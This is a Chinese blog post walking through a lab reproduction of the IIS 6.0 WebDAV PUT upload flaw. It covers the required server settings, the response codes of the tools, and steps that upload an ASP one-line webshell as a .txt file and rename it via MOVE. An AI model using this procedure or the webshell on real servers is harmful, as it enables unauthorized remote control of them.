IIS6.0的PUT文件上传漏洞的复现

首条博客，文笔有限。

利用工具

1、IIS PUT Scaner By ZwelL

2、桂林老兵IIS写权限利用程序

 

----------------------------------------

 

1、IIS来宾用户对网站文件夹有写入权限

2、Web服务扩展:WebDAV—打勾

3、网站主目录:写入—打勾(可PUT)

4、网站主目录:脚本资源访问—打勾（可COPY、MOVE）

 

-----------------------------------------

 

1、IIS PUT Scaner

只要开启WebDAV，PUT都显示YES。无论是否可写入，该工具都无法写入。

 

2、IIS写权限利用程序

WebDAV未开启

HTTP/1.1 501 Not Implemented

 

PUT成功

HTTP/1.1 201 Created 或 HTTP/1.1 200 OK

PUT失败（网站主目录:写入—未打勾）

HTTP/1.1 403 Forbidden

PUT失败（IIS来宾用户没有写入权限）

HTTP/1.1 401 Unauthorized

 

COPY成功

HTTP/1.1 201 Created 或 HTTP/1.1 204 No Content

COPY失败（网站主目录:脚本资源访问—未打勾）

HTTP/1.1 207 Multi-Status

 

MOVE成功

HTTP/1.1 201 Created

MOVE失败（网站主目录:脚本资源访问—未打勾）

HTTP/1.1 207 Multi-Status

 

-----------------------------------------

1.搭建Windows server2003+IIS6.0环境

2.使用nc.exe监听工具查看是否拥有相关权限

cmd line输入目标IP

potions 输入协议版本

host 输入目标地址

 3.使用iisPutscanner.exe工具查看目标主机是否允许PUT

键入目标IP

显示YES说明可以

4.使用IISwrite.exe工具对目标就行put提交

选择PUT模式，选择txt文件，文件内容为asp的一句话木马。

例：<%eval request("admin")%>

如果直接上传.asp,会出现识别不到的错误，所以先使用txt文件就行上传。

 

中间件无法直接处理.txt中的一句话木马，所以使用MOVE模式对已经上传的.txt就行复制重命名为.asp的文件。如图中MOVE命令的意思就是将test.txt复制重命名为shell.asp。

5.上菜刀或者蚁剑

 

 完成。

 可能遇到的问题：

1.上传完成后无法解析shell.asp文件

解决方法：

开启Active Server Pages扩展

 如遇其他问题，请在评论区留言。

 

 

 

转自：https://www.cnblogs.com/Rcsec/archive/2004/01/13/8911024.html